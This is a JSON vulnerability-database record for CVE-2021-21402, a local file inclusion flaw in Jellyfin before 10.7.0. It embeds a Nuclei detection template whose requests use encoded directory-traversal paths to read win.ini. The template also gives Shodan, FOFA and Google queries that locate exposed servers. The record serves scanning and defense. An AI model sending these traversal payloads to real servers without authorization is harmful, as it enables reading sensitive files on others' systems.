{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2021-21402/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2021-21402/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2021-21402/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2021-21402/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2021-21402/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2021-21402"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2021-21402"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2021/CVE-2021-21402.yaml",
    "nuclei_template_severity": "medium",
    "nuclei_template_yaml": "id: CVE-2021-21402\n\ninfo:\n  name: Jellyfin <10.7.0 - Local File Inclusion\n  author: dwisiswant0\n  severity: medium\n  description: |\n    Jellyfin before 10.7.0 is vulnerable to local file inclusion. This issue is more prevalent when Windows is used as the host OS. Servers exposed to public Internet are potentially at risk.\n  impact: |\n    Successful exploitation could allow an attacker to read sensitive files on the server.\n  remediation: This is fixed in version 10.7.1.\n  reference:\n    - https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/\n    - https://github.com/jellyfin/jellyfin/security/advisories/GHSA-wg4c-c9g9-rxhx\n    - https://github.com/jellyfin/jellyfin/releases/tag/v10.7.1\n    - https://github.com/jellyfin/jellyfin/commit/0183ef8e89195f420c48d2600bc0b72f6d3a7fd7\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-21402\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 6.5\n    cve-id: CVE-2021-21402\n    cwe-id: CWE-22\n    epss-score: 0.79313\n    epss-percentile: 0.99582\n    cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: jellyfin\n    product: jellyfin\n    shodan-query:\n      - http.html:\"Jellyfin\"\n      - http.html:\"jellyfin\"\n      - http.title:\"jellyfin\"\n    fofa-query:\n      - title=\"Jellyfin\" || body=\"http://jellyfin.media\"\n      - title=\"jellyfin\"\n      - body=\"jellyfin\"\n      - title=\"jellyfin\" || body=\"http://jellyfin.media\"\n    google-query: intitle:\"jellyfin\"\n  tags: cve,cve2021,jellyfin,lfi,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/\"\n      - \"{{BaseURL}}/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: header\n        words:\n          - \"Content-Type: application/octet-stream\"\n\n      - type: regex\n        part: body\n        regex:\n          - \"\\\\[(font|extension|file)s\\\\]\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502204cc5563aed7400fa2268752839688a8498469d324f2de4a2f38144fec1c44bc6022100eff54d2156826a01248efeb51f67149a2836ce4db984ed74290c70aca2ddcc2c:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2021-21402"
}